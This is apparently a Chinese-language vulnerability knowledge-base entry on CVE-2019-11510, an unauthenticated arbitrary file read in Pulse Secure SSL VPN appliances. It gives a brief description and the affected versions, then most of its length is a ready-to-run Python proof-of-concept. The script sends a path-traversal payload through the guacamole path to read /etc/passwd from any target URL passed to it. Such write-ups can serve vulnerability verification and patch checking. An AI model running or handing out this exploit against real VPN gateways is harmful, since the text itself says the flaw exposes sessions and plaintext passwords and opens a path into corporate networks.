(CVE-2019-11510)Pulse Secure SSL VPN 任意文件读取
一、漏洞简介
Pulse Secure Pulse Connect Secure(又名 PCS,前称 Juniper Junos Pulse)是美国 Pulse Secure 公司的一套 SSL VPN 解决方案。爆发的 CVE-2019-11510 该漏洞是由于所引入的一项通过浏览器访问其他端口的新功能缺乏安全限制所导致的,任意攻击者都可在未经身份验证的情况下利用该漏洞,读取系统敏感文件,获取 session、明文密码等敏感信息,从而非法入侵并操控 VPN,从而进一步威胁企业内网服务。
二、漏洞影响
Pulse Secure PCS 9.0RX
Pulse Secure PCS 8.3RX
Pulse Secure PCS 8.2RX
Pulse Secure PCS 8.1R15.1
三、复现过程
poc
Pcs_Ssl_Vpn_CVE_2019_11510@Coco413.py
PulseSecureSSLVPN任意文件读取/media/rId25.png)
# -*- coding:utf-8 -*-
# !/usr/bin/env python
import sys
import urlparse
import requests
import warnings
import traceback
reload(sys)
sys.setdefaultencoding('utf-8')
requests.packages.urllib3.disable_warnings()
warnings.filterwarnings("ignore")
def CVE_2019_11510(base_url):
try:
payloads, keywords = "/dana-na/../dana/html5acc/guacamole/../../../../../../../etc/passwd?/dana/html5acc/guacamole/", "root:x"
r = requests.get(base_url + payloads, verify=False)
r.close()
if keywords in r.text:
print "[✓] Found CVE-2019-11510 Vuln address(curl --path-as-is -s -k <target>):\n{}\n{}".format(
base_url + payloads, r.content)
else:
print "[x] Not Found Vuln!"
except requests.exceptions.ConnectionError:
pass
except requests.ReadTimeout:
pass
except:
traceback.print_exc()
if __name__ == '__main__':
if len(sys.argv) == 1:
print '[+] Tip: python Pcs_Ssl_Vpn_CVE_2019_11510@Coco413.py <url>'
sys.exit(0)
url = sys.argv[1]
CVE_2019_11510(urlparse.urlparse(url).scheme + "://" + urlparse.urlparse(url).hostname)